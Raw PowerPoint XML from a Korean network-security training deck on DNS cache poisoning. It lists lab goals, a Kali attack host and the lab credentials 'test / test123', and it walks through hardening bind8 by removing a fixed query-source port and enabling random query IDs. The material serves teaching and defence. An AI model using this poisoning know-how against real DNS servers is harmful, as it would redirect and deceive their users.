          <p:cNvPr id="38" name="Picture 14" descr="appendix icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF5A187-5DE1-4A4A-8190-F2DCF30DE9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5354" y="3380506"/>
            <a:ext cx="586243" cy="586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타원 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D901AF2-8468-4E57-A19A-D88B7F554DE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="3308419"/>
            <a:ext cx="730420" cy="730420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4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent4">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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36006CD-64B2-4E12-B317-9204AA016FB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="3313578"/>
            <a:ext cx="4432682" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent4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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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참고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="7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사항</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="7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[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시스템 정보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  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계정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: test / test123</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="41" name="Picture 4" descr="목표 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF9F62EB-7866-4E3F-8A25-E78C25AC4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559" y="2093753"/>
            <a:ext cx="677306" cy="677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9C59BC4E-1690-4F25-A340-257E8B4DCFAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496054" y="2093753"/>
            <a:ext cx="4432682" cy="836832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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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교육</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="7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목표</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="7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chemeClr val="bg2">
                    <a:lumMod val="7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- DNS Cache Poisoning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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공격을 수행할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="7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- DNS Cache Poisoning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공격에 대응할 수 있다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0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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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DNS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서버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: Linux (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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Lubuntu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공격 서버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: Linux (Kali)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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2" name="Picture 2" descr="보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF5DE74-F8E6-45FD-90D3-B942ECC721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74" t="12467" r="11967" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="662681" y="3412409"/>
            <a:ext cx="565945" cy="562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42576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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 파일 열기 편집</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>named.conf</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>설정 변경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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="5558273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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ query-source port 33333; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>삭제 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>➡ 상위 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버의 응답을 수신하는 포트를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>33333</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>으로 고정하지 않음</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>         (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>단</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>질의별로 다른 포트 번호가 부여되는 것은 아니며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, bind8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 시작될 때 임의로 지정됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ use-id-pool true;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    ➡ ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 순차적으로 증가시키는 대신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>풀에서 임의의 값을 사용</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>killall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 4) bind8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> named</a:t>
            </a:r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ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F084CBD-CD74-417C-9767-2BEDE009EB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222" y="948266"/>
            <a:ext cx="2417953" cy="328041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624D5152-B9DF-49A2-83BE-4E3736A461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296" y="1743125"/>
            <a:ext cx="5340812" cy="4408583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D994BA32-A039-4139-A7DE-C27D679DD75B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6317760" y="985035"/>
          <a:ext cx="5327904" cy="738759"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3303148218"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3403098023"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3514532794"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="23469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변경 전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변경 후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비고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8118397"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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query-source port 33333;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라인 삭제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1054174"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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use-id-pool false;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use-id-pool true;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false → true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8078306"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C5D17E-4C78-4D00-B07E-529D5D47B3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5608" y="3862916"/>
            <a:ext cx="1782826" cy="284226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9A3D7B-A7D5-484E-8CA8-FD5787240D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0922" y="4741753"/>
            <a:ext cx="1516507" cy="305689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic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9E4A0B6A-B8C6-4BA4-AA37-F16B407F0089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6210742" y="5127703"/>
          <a:ext cx="5328158" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3378860283"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="234696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참고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9152761"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="172720" marR="0" indent="-17272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※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질의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랜덤 값이 사용되더라도 공격을 반복적으로 수행함으로써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DNS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캐시 오염을 성공시킬 수도 있음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22100375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81D5CEE9-902B-4C5B-83D1-A4BA74074FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="6028002"/>
            <a:ext cx="5616792" cy="460175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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" b="1" i="1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30393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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 13. DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
